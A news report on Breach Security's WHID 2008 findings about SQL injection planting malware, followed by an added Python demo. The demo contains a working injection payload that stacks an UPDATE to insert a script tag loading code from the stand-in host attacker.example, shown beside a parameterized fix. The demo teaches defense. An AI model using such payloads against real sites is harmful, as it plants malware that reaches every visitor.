Breach Security announced that web attackers unleashed a new type of SQL injection attack in 2008 that compromised more than 500,000 web sites, according to its Web Hacking Incidents Database (WHID) 2008 Annual Report. Marking a major event for the web application security landscape, the report found that SQL injection attacks used to plant malware on target web sites were the most common attack vector employed by online criminals last year.
Breach's WHID report also noted a shift in attack methodology: in 2008, rather than targeting sensitive information held in a web site's database, attackers increasingly went after the site's large customer base. Content injected into the database is served to every visitor, turning the web site itself into a malware launching point for legitimate users. The report also highlights one important factor: the unknown. Twenty-nine percent of the incidents were reported without specifying the attack method. This lack of attack vector confirmation may be attributed to a combination of two main factors: lack of visibility into web traffic and resistance to public disclosure.
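The mechanism the report describes, as an added illustration that is not part of the WHID report or of Breach Security's material: a search feature that concatenates user input into a query lets an attacker append an UPDATE that tags every stored description with a script element, which the site then serves to every visitor. The product table, the sample rows, and the attacker.example host are constructed for the demo; SQLite's executescript() stands in for a database driver that accepts stacked statements, an assumption made so the injection can be reproduced offline. The parameterized version binds the same input as data and leaves the table untouched.

```python
"""Added example (not from the WHID report): SQL injection that plants a
script tag in stored content, beside the parameterized fix."""
import sqlite3

# Constructed sample data: a catalogue whose descriptions are rendered
# straight into HTML pages served to visitors.
SEED = [
    ("Widget", "A basic widget."),
    ("Gadget", "A deluxe gadget."),
]

# Hypothetical attacker-controlled host used only for this demo.
INJECTED_TAG = '<script src="http://attacker.example/m.js"></script>'

# Injection payload: closes the LIKE pattern and its quote, appends an
# UPDATE that tags every description, then comments out the query's tail.
PAYLOAD = (
    "x%'; UPDATE products SET description = description || '"
    + INJECTED_TAG
    + "'; --"
)


def new_db():
    """Fresh in-memory database seeded with the constructed catalogue."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE products (name TEXT, description TEXT)")
    conn.executemany("INSERT INTO products VALUES (?, ?)", SEED)
    conn.commit()
    return conn


def search_vulnerable(conn, term):
    """String-concatenated query. executescript() emulates a driver that
    runs stacked statements (assumption for the demo), so the attacker's
    UPDATE executes alongside the intended SELECT."""
    sql = "SELECT name FROM products WHERE name LIKE '%" + term + "%'"
    conn.executescript(sql)


def search_safe(conn, term):
    """Parameterized query: the term is bound as data, never parsed as SQL."""
    rows = conn.execute(
        "SELECT name FROM products WHERE name LIKE ?", ("%" + term + "%",)
    )
    return [r[0] for r in rows]


def render_catalog(conn):
    """Emulates the page a visitor receives. Descriptions are emitted
    verbatim, which is what lets an injected <script> reach every visitor."""
    rows = conn.execute(
        "SELECT name, description FROM products ORDER BY name"
    )
    return "\n".join(f"<li>{n}: {d}</li>" for n, d in rows)


def compromised(conn):
    """True if the served page now carries the attacker's script tag."""
    return INJECTED_TAG in render_catalog(conn)


def demo():
    """Run the payload against both code paths and report the outcome."""
    vuln = new_db()
    search_vulnerable(vuln, PAYLOAD)
    safe = new_db()
    safe_hits = search_safe(safe, PAYLOAD)
    return compromised(vuln), compromised(safe), safe_hits


if __name__ == "__main__":
    vuln_hit, safe_hit, hits = demo()
    print("vulnerable path serves injected script:", vuln_hit)
    print("parameterized path serves injected script:", safe_hit)
    print("parameterized search results for payload:", hits)
```

The fix for the injection is binding parameters, not filtering characters; escaping stored content at render time (for example with html.escape) is a separate, complementary defense against content that is already in the database.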
The 2008 WHID report identified multiple hacking-for-profit mechanisms. Nineteen percent of attacks were aimed at stealing personal information. Traded easily on the Internet, personal records are the easiest virtual commodity to exchange for money. In addition, the report found that criminals also exploited web sites for financial gain by planting malware and by phishing, which comprised 16 percent and 5 percent of attacks in 2008, respectively.
Breach's WHID report found that financial gain is not the only motivation for online attacks. The number one attack goal in 2008 was web site defacement. Ideologically motivated attackers primarily targeted political parties, candidates and government departments, often defacing a web site with a very specific message related to a campaign.
Consistent with the ideology-driven defacement noted in 2008, the WHID report also found that "Government, Security and Law Enforcement," at 32 percent, was the top vertical market targeted by attackers. Internet-related organizations topped the list on the commercial side, including retail shops (mostly e-commerce sites), media companies and pure Internet services such as search engines and service providers. In addition, financial institutions rose sharply in 2008, moving up to fourth place.